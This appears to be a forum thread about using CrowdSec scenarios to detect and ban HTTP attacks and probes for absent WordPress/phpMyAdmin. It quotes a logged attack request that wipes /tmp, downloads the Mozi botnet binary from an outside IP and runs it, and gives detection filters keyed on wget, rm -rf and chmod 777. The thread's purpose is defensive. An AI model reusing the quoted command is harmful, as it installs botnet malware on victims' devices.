First of all, I don’t know what this type of attack/attempt is called, but I sometimes get requests like the following:
221.1.173.68 - - [09/Feb/2022:06:04:09 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://221.1.173.68:35656/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 19 "-" "Hello, world" 47344 "-" "-" 0ms
Is there a scenario available to identify and ban those kinds of requests? Currently, I have a matching regex in fail2ban targeted at this.
Also, is it possible to identify and ban IPs which just scan for services? E.g. I don’t run WordPress or PHP, so every request for wp-login.php or phpmyadmin is logged with a 404. I see that this cannot be generalized, since a lot of people offer these kinds of services, but is it possible to just trigger this on my machine?
Thanks for your help!
Hi
There is no scenario matching that specific attack. But there are others that look for attempts to get a shell, like this. It’s quite trivial to write a scenario that would match what you see in your log. We have an article on that (among other things) here.
The solution to your last question also lies in scenarios.
For instance, you can install all WordPress scenarios from the hub. All installed scenarios match an attack you want to detect. And you don’t have to actually have the service installed as long as you have the relevant logfiles - which you would for all HTTP-based attacks. So installing this would also be a good idea since it’s actually made for that purpose
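As an added example (not from the original thread, the CrowdSec hub or its maintainers), here is what a scenario file covering both questions could look like: a `trigger` bucket that fires on a single request whose path carries the command-injection fragments visible in the log line above, and a `leaky` bucket that fires when one source collects several 404s on WordPress/phpMyAdmin paths that this server does not serve. Assumptions: the access log is parsed by the hub nginx/apache parser so that `evt.Meta.http_path`, `evt.Meta.http_status`, `evt.Meta.service` and `evt.Meta.source_ip` are populated (the extra trailing fields in the log line above may need a custom parser), and the scenario names under `example/` are hypothetical.

```yaml
# Added example, not a hub scenario. Two scenarios in one file, separated by "---".
# Scenario 1: one request is enough, so a trigger bucket with no capacity.
type: trigger
name: example/http-shell-command-injection      # hypothetical name
description: "Shell command fragments (wget/chmod/rm) injected into an HTTP request path"
# Only look at parsed HTTP access/error logs; lower-case the path so mixed case does not evade the match.
# The fragments are the ones present in the logged request: "cd /tmp; rm -rf *; wget ...; chmod 777 ...".
filter: >-
  evt.Meta.log_type in ['http_access-log', 'http_error-log'] &&
  evt.Meta.service == 'http' &&
  (
    Lower(evt.Meta.http_path) contains ';wget+' ||
    Lower(evt.Meta.http_path) contains ';rm+-rf' ||
    Lower(evt.Meta.http_path) contains 'chmod+777'
  )
groupby: evt.Meta.source_ip
# Do not re-alert on the same source for a minute after the first overflow.
blackhole: 1m
labels:
  service: http
  type: exploit
  remediation: true        # lets the bouncer act on the resulting decision
---
# Scenario 2: probing for software that is not installed. Each distinct 404 path adds one
# token; capacity 2 means the bucket overflows on the third distinct path within ~60s.
type: leaky
name: example/http-absent-service-probing       # hypothetical name
description: "Repeated 404s on wp-login.php / phpmyadmin from one IP on a host without WordPress or PHP"
filter: >-
  evt.Meta.log_type in ['http_access-log', 'http_error-log'] &&
  evt.Meta.service == 'http' &&
  evt.Meta.http_status == '404' &&
  (
    Lower(evt.Meta.http_path) contains 'wp-login.php' ||
    Lower(evt.Meta.http_path) contains 'phpmyadmin'
  )
groupby: evt.Meta.source_ip
distinct: evt.Meta.http_path   # same path hit twice counts once
capacity: 2
leakspeed: 60s
blackhole: 5m
labels:
  service: http
  type: scan
  remediation: true
```

Drop the file into `/etc/crowdsec/scenarios/`, restart the agent, and replay the logged request with `cscli explain --log '<the access log line>' --type nginx` to confirm the parser fills the fields the filters rely on and that scenario 1 overflows on that single line. The `http_status == '404'` condition in scenario 2 is what keeps it specific to a host that does not run these applications: on a server that really serves WordPress, those paths would return 200/302 and the bucket would never fill.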
Thanks for your answer! I just installed the http-cve scenarios, thanks for the hint! I will look into writing my own scenario eventually, but have to find some time first